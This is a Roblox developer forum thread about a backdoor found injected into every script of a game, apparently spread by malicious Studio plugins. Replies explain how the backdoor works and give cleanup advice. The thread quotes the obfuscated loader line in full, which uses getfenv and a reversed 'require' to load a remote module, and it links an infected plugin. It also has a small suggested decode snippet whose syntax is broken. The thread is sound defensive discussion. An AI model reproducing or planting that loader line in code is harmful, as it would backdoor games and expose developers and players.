What is RoSync?

Recently while helping my friend make his game, I noticed this line inside EVERY script:
--[[ Last synced 9/26/2020 04:22 RoSync Loader ]] getfenv()[string.reverse("\101\114\105\117\113\101\114")](5722703997) --[[ ]]--

What is this?
It definitley looks like a backdoor, but what is it exactly and how do I get rid of it?
Also it comes back after I remove the line

EDIT: Managed to get rid of it with RoDefender, it was named “AntiVirus”
Had to clear out the scripts manually though :confused:

EDIT 2: This post seems to get a lot of traction, so my advice is just to watch out for plugins. All the scripts changed while in studio, so a normal model/script cant do that. It was probably one of my friends plugins, since this appeared only in his team create game. So just watch out for any suspicious plugins, and download only the official ones (check if the creator is not a group!)

76 Likes

I could very well be a backdoor, I’ve heard they require Certain modules and use getfenv() and setfenv()

And they named it antivirus to hide what it does

18 Likes

@DoctorNO2106 is right, it’s a backdoor. That code is the basically the same thing as require(5722703997). This could be used for numerous things, but I’m assuming it’s being used for “Server-side Exploits”.

The easiest way to fix this is to use the Find Results tool in Studio and search for 5722703997 in all Scripts, and remove that line from the Script

Here is where the rabbit hole of require() functions lead you to: [ Content Deleted ] - Roblox, an obfuscated ModuleScript.

30 Likes

The line of code also came back when I removed it, does this mean its a plugin??

4 Likes

Most likely a malicious plugin that is installed in your studio, is causing this. I would recommend installing plugins that are from trusted creators only.

7 Likes

I have no suspicious plugins installed, I really have no idea what caused that

Would you mind sending a list of your plugins? Also, if the game has Team Create enabled make sure none of your collaborators have a malicious plugin either

2 Likes

Its a backdoor that infects every script through plugins made by malicious people. I found this out through a friends game that had over 700 scripts infected by this. Thankfully they were able to fix this by reverting to a older version of the game that was made not that long ago.

https://www.roblox.com/library/5722705373/Light-Editor-Updated
This plugin is an example of it that has the backdoor and there is most likely more of them.

12 Likes

Have you installed a plugin by a group named Creator Studio recently?

Their plugins are well known to be virus plugins. I’m attempting to tunnel their module requests and I can give you more information when possible.

Tunnelled Asset Located: [ Content Deleted ] - Roblox
The request asset has been reported

5 Likes

I have a few links I saved from yesterday when I was still trying to figure out the problem. here are the links if you want them:

They are all made by the same account.

3 Likes

These accounts dont hide their inventory, if you go there and click the latest one with a script icon, you can tunnel them much quicker.

I’m going to be dropping my magic snooper script to figure out what exactly these scripts are doing past the levels of obfuscation

2 Likes

Thanks to my little Sniffer module, which i ran into a few issues with, exposes exactly what this script does, completely ignoring the obfuscation

image

I’m currently trying to figure out where that http request is going.

16 Likes

Did you ever figure out where the HTTP request went? I’m experiencing this same issue in one of my games now.

3 Likes

Hey, I’m pretty interested in this stuff, would you mind showing how some of this is done? Seems ridiculous that you can use a simple module to sandbox an obfuscated script.

3 Likes

I think you could literally just do
print(string.reverse("\101\114\105\117\113\101\114")](5722703997))
for this case

2 Likes

All you have to do to find where this goes is to copy/paste the ID it’s requiring (which is in plain site) into your browser address bar. There’s no fancy tricks needed to see what this does.

Edit: He’s talking about the module script that he reached once he went down the rabbit hole of scripts. It’s obfuscated, and you need some fancy tricks to figure out what’s going on in that script.

2 Likes

Yeah, the annoying thing is that you cant actually see what this does since its a module chain, and I really dont feel like sorting through 50+ modules

EDIT: Oh yeah, I forgot that you can obfuscate scripts, makes it even more annoying lol

1 Like

Well, there’s still a few edgecases that I need to figure out, one of the script I managed to trace, was somehow able to detect that I was modifying the global environment, probably with a length checker or smth, if you’d like to talk more about trying to sandbox silently, I’m happy to

4 Likes

This might not be true, but I think the HTTP request could be going to a Discord webhook or a similar service to have a live feed of backdoored games

4 Likes

Quick update on my situation on this:

After doing the long process of going through every script in the game and scrolling down to the line then selecting the whole line and deleting it, I’m safe to say that the issue was fixed.

This was causing multiple peoples games to crash as it caused a memory leak, after doing this the client memory went down to 400 (was 1,400 originally) and players stopped getting kicked, sometimes the long way is the hard way but it worked. Other than that, remove your plugins that aren’t made by a trusted developer.

3 Likes